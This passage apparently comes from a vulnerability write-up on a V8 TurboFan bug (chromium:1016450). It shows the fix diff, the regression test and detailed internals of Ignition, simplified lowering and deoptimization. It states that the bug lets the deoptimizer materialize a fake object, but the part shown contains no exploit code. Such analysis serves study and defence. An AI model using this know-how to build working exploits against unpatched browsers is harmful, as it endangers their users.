+          ConvertInput(node, i, UseInfo::AnyTagged());
         }

         (*types)[i] =
@@ -1220,11 +1220,22 @@
     // Accumulator is a special flower - we need to remember its type in
     // a singleton typed-state-values node (as if it was a singleton
     // state-values node).
+    Node* accumulator = node->InputAt(2);
     if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
     } else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
       Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
       if (accumulator == jsgraph_->OptimizedOutConstant()) {
         node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
       } else {
@@ -1237,7 +1248,7 @@
         node->ReplaceInput(
             2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                               types, SparseInputMask::Dense()),
-                                          accumulator));
+                                          node->InputAt(2)));
       }
     }

This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1876057
Commit-Queue: Nico Hartmann <[email protected]>
Auto-Submit: Nico Hartmann <[email protected]>
Reviewed-by: Jakob Gruber <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#64738}

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
  let y = BigInt.asUintN(64, 15n);
  // Introduce a side effect to force the construction of a FrameState that
  // captures the value of y.
  g = 42;
  try {
    return x + y;
  } catch(_) {
    return y;
  }
}


%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);

Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

Because after a deoptimizaton execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: what ignition registers?). To do that, the deoptimizer uses those deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

Internals

To understand this bug, we want to know:

what is ignition (because we deoptimize back to ignition)
what is simplified lowering (because that's where the bug is)
what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

Ignition

Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means opcode's inputs and output are using only registers. There is an accumulator used as an implicit operand for many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
  let value = val + 42;
  o.x = value;
}
opt_me({x:1.1});

Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
   13 E> 0000017DE515F366 @    0 : a5                StackCheck
   41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
   45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
         0000017DE515F36C @    6 : 26 fb             Star r0
   53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
   57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
         0000017DE515F374 @   14 : 0d                LdaUndefined
   67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
 - map: 0x00d580740789 <Map>
 - length: 1
           0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)

Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
 - map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0000004B05BFE830

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10

This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
 - code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...

Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src\codegen\x64\register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
  // handler at the current bytecode offset.
  Label do_dispatch;
  __ bind(&do_dispatch);
  __ Move(
      kInterpreterDispatchTableRegister,
      ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
  __ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  __ movq(kJavaScriptCallCodeStartRegister,
          Operand(kInterpreterDispatchTableRegister, r11,
                  times_system_pointer_size, 0));
  __ call(kJavaScriptCallCodeStartRegister);
  masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

  // Any returns to the entry trampoline are either due to the return bytecode
  // or the interpreter tail calling a builtin and then a dispatch.

  // Get bytecode array and bytecode offset from the stack frame.
  __ movq(kInterpreterBytecodeArrayRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
  __ movq(kInterpreterBytecodeOffsetRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
  __ SmiUntag(kInterpreterBytecodeOffsetRegister,
              kInterpreterBytecodeOffsetRegister);

  // Either return, or advance to the next bytecode and dispatch.
  Label do_return;
  __ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  AdvanceBytecodeOffsetOrReturn(masm, kInterpreterBytecodeArrayRegister,
                                kInterpreterBytecodeOffsetRegister, rbx, rcx,
                                &do_return);
  __ jmp(&do_dispatch);

Ignition handlers

Ignitions handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
  Node* accumulator = GetAccumulator();
  Node* relative_jump = BytecodeOperandUImmWord(0);
  CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
  CSA_ASSERT(this, IsBoolean(accumulator));
  JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}

Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

void BinaryOpWithFeedback(BinaryOpGenerator generator) {
    Node* lhs = LoadRegisterAtOperandIndex(0);
    Node* rhs = GetAccumulator();
    Node* context = GetContext();
    Node* slot_index = BytecodeOperandIdx(1);
    Node* maybe_feedback_vector = LoadFeedbackVector();

    BinaryOpAssembler binop_asm(state());
    Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
                                          maybe_feedback_vector, false);
    SetAccumulator(result);
    Dispatch();
}

From this code, we understand that when executing AddSmi [42], [0], V8 ends-up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left hand side of the addition is the operand 0 ([42] in this case), the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.

It is interesting to point out to observe the call to Dispatch. We may expect that every handler is called from within the do_dispatch label of InterpreterEntryTrampoline whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to the do_dispatch)

Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition to true and recompile the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

--trace-ignition
--trace_feedback_updates

There are also a few interesting runtime functions:

Runtime_InterpreterTraceBytecodeEntry
- prints ignition registers before executing an opcode
Runtime_InterpreterTraceBytecodeExit
- prints ignition registers after executing an opcode
Runtime_InterpreterTraceUpdateFeedback
- displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
    return a + b;
}

We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
      [          r2 -> 0x3ede813004a9 <undefined> ]
      [          r3 -> 42 ]
      [          r4 -> 1 ]
 -> 0x193680a1fa56 @    0 : a5                StackCheck 
 -> 0x193680a1fa57 @    1 : 25 02             Ldar a1
      [          a1 -> 1 ]
      [ accumulator <- 1 ]
 -> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
      [ accumulator -> 1 ]
      [          a0 -> 42 ]
      [ accumulator <- 43 ]
 -> 0x193680a1fa5c @    6 : a9                Return 
      [ accumulator -> 43 ]
 -> 0x193680a1f83a @   36 : 26 fb             Star r0
      [ accumulator -> 43 ]
      [          r0 <- 43 ]
 -> 0x193680a1f83c @   38 : a9                Return 
      [ accumulator -> 43 ]

Simplified lowering

Simplified lowering is actually divided into three main phases :

The truncation propagation phase (RunTruncationPropagationPhase)
- backward propagation of truncations
The type propagation phase (RunTypePropagationPhase)
- forward propagation of types from type feedback
The lowering phase (Run, after calling the previous phases)
- may lower nodes
- may insert conversion nodes

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :

function f(a) {
  if (a) {
    var x = 2;
  }
  else {
    var x = 5;
  }
  return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);

Propagating truncations

To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
  initial #30: no-value-use

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kEnd:
       // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use informations. The first input is truncated to a word32. The other inputs are not truncated. The output is tagged.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
    // ...
    switch (node->opcode()) {
      // ...
      case IrOpcode::kReturn:
        VisitReturn(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);
      // ...
    }
  }

  void VisitReturn(Node* node) {
    int tagged_limit = node->op()->ValueInputCount() +
                       OperatorProperties::GetContextInputCount(node->op()) +
                       OperatorProperties::GetFrameStateInputCount(node->op());
    // Visit integer slot count to pop
    ProcessInput(node, 0, UseInfo::TruncatingWord32());

    // Visit value, context and frame state inputs as tagged.
    for (int i = 1; i < tagged_limit; i++) {
      ProcessInput(node, i, UseInfo::AnyTagged());
    }
    // Only enqueue other inputs (effects, control).
    for (int i = tagged_limit; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
  }

In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
  initial #29: truncate-to-word32
  initial #28: no-truncation (but distinguish zeros)
   queue #28?: no-truncation (but distinguish zeros)
  initial #21: no-value-use

All the inputs (29, 28 21) are set in the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)

When visiting the node 28, the visitor for SpeculativeNumberModulus, in that case, decides that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
  initial #24: truncate-to-word32
  initial #23: truncate-to-word32
  initial #13: no-value-use
   queue #21?: no-value-use

Indeed, if we look at the code of the visitor, if both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN(), which is the case since they are typed as Range(66,66) and Range(2,5) , and the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32() (true because the node is typed as Range(0,4)) then, a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to Any. It also add all the inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }
    // ...
  }

  void VisitWord32TruncatingBinop(Node* node) {
    VisitBinop(node, UseInfo::TruncatingWord32(),
               MachineRepresentation::kWord32);
  }

  // Helper for binops of the I x I -> O variety.
  void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    VisitBinop(node, input_use, input_use, output, restriction_type);
  }

  // Helper for binops of the R x L -> O variety.
  void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
                  MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    DCHECK_EQ(2, node->op()->ValueInputCount());
    ProcessInput(node, 0, left_use);
    ProcessInput(node, 1, right_use);
    for (int i = 2; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
    SetOutput(node, output, restriction_type);
  }

For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
  initial #19: no-value-use
  initial #17: no-value-use

It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kMerge:
      // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
 visit #23: Phi (trunc: truncate-to-word32)
  initial #20: truncate-to-word32
  initial #22: truncate-to-word32
   queue #21?: no-value-use
 visit #13: JSStackCheck (trunc: no-value-use)
  initial #12: no-truncation (but distinguish zeros)
  initial #14: no-truncation (but distinguish zeros)
  initial #6: no-value-use
  initial #0: no-value-use

Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
  void VisitPhi(Node* node, Truncation truncation,
                SimplifiedLowering* lowering) {
    MachineRepresentation output =
        GetOutputInfoForPhi(node, TypeOf(node), truncation);
    // Only set the output representation if not running with type
    // feedback. (Feedback typing will set the representation.)
    SetOutput(node, output);

    int values = node->op()->ValueInputCount();
    if (lower()) {
      // Update the phi operator.
      if (output != PhiRepresentationOf(node->op())) {
        NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
      }
    }

    // Convert inputs to the output representation of this phi, pass the
    // truncation along.
    UseInfo input_use(output, truncation);
    for (int i = 0; i < node->InputCount(); i++) {
      ProcessInput(node, i, i < values ? input_use : UseInfo::None());
    }
  }

Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
 visit #22: NumberConstant (trunc: truncate-to-word32)

They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
        double const value = OpParameter<double>(node->op());
        int value_as_int;
        if (DoubleToSmiInteger(value, &value_as_int)) {
          VisitLeaf(node, MachineRepresentation::kTaggedSigned);
          if (lower()) {
            intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
            DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
          }
          return;
        }
        VisitLeaf(node, MachineRepresentation::kTagged);
        return;
      }

We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase that is currently being executing.

  bool lower() const { return phase_ == LOWER; }
  bool retype() const { return phase_ == RETYPE; }
  bool propagate() const { return phase_ == PROPAGATE; }

That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

Retyping

There isn't so much to say about the retyping phase. Starting from the End node, every node of the graph is put in a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and revisited. This allows to forward propagate updated type information (starting from the Start, not the End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed :

 visit #29: NumberConstant
  ==> output kRepTaggedSigned

For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
 visit #23: Phi
  ==> output kRepWord32

#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
 visit #28: SpeculativeNumberModulus
  ==> output kRepWord32

Lowering and inserting conversions

Now that every node has been associated with use informations for every input as well as an output representation, the last phase consists in :

lowering the node itself to a more specific one (via a DeferReplacement for instance)
converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's get through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant @29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it to be truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput function. It will itself call the representation changer via the function GetRepresentationFor. Because the truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
  return jsgraph()->Int32Constant(DoubleToInt32(value));
}

visit #30: Return
  change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32

For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
    else if (IsWord(output_rep)) {
    if (output_type.Is(Type::Signed31())) {
      op = simplified()->ChangeInt31ToTaggedSigned();
    }

visit #30: Return
  change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)

The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
  change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi

If we compare the graph (well, a subset), we can observe :

the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering :

This is after :

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
  Uint32BinopMatcher m(node);
  Node* const minus_one = jsgraph()->Int32Constant(-1);
  Node* const zero = jsgraph()->Uint32Constant(0);
  Node* const lhs = m.left().node();
  Node* const rhs = m.right().node();

  if (m.right().Is(0)) {
    return zero;
  } else if (m.right().HasValue()) {
    return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
  }

  // General case for unsigned integer modulus, with optimization for (unknown)
  // power of 2 right hand side.
  //
  //   if rhs == 0 then
  //     zero
  //   else
  //     msk = rhs - 1
  //     if rhs & msk != 0 then
  //       lhs % rhs
  //     else
  //       lhs & msk
  //
  // Note: We do not use the Diamond helper class here, because it really hurts
  // readability with nested diamonds.
  const Operator* const merge_op = common()->Merge(2);
  const Operator* const phi_op =
      common()->Phi(MachineRepresentation::kWord32, 2);

  Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
  Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
                                   graph()->start());

  Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
  Node* true0 = zero;

  Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
  Node* false0;
  {
    Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

    Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
    Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

    Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
    Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

    Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
    Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

    if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
    false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
  }

  Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
  return graph()->NewNode(phi_op, true0, false0, merge0);
}

A high level overview of deoptimization

Understanding deoptimization requires to study several components of V8 :

instruction selection
- when descriptors for FrameState and StateValues nodes are built
code generation
- when deoptimization input data are built (that includes a Translation)
the deoptimizer
- at runtime, this is where execution is redirected to when "bailing out to deoptimization"
- uses the Translation
- translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kind of nodes related to deoptimization such as :

Checkpoint
- refers to a FrameState
FrameState
- refers to a position and a state, takes StateValues as inputs
StateValues
- state of parameters, local variables, accumulator
Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization :

eager, when you deoptimize the current function on the spot
- you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
lazy, you deoptimize later
- another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
soft
- a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
let obj = {};
obj[x] = 42;
}

add_prop("x");
%PrepareFunctionForOptimization(add_prop);
add_prop("x");
add_prop("x");
add_prop("x");
%OptimizeFunctionOnNextCall(add_prop);
add_prop("x");
add_prop("different");

Now run it using --turbo-profiling and --print-code-verbose.

This allows to dump the deoptimization input data :

Deoptimization Input Data (deopt points = 5)
 index  bytecode-offset    pc  commands
     0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               STACK_SLOT {input=-1}
                               STACK_SLOT {input=4}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

     4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rcx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason '(unknown)'
                         ;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason 'wrong name'
                         ;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop

Interestingly (you'll need to also add the --code-comments flag), we can notice that the beginning of an native turbofan compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
                  -- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10

Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
            ;;; deoptimize at <test.js:3:8>, wrong name

It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
      0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
      1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
      2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
      3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
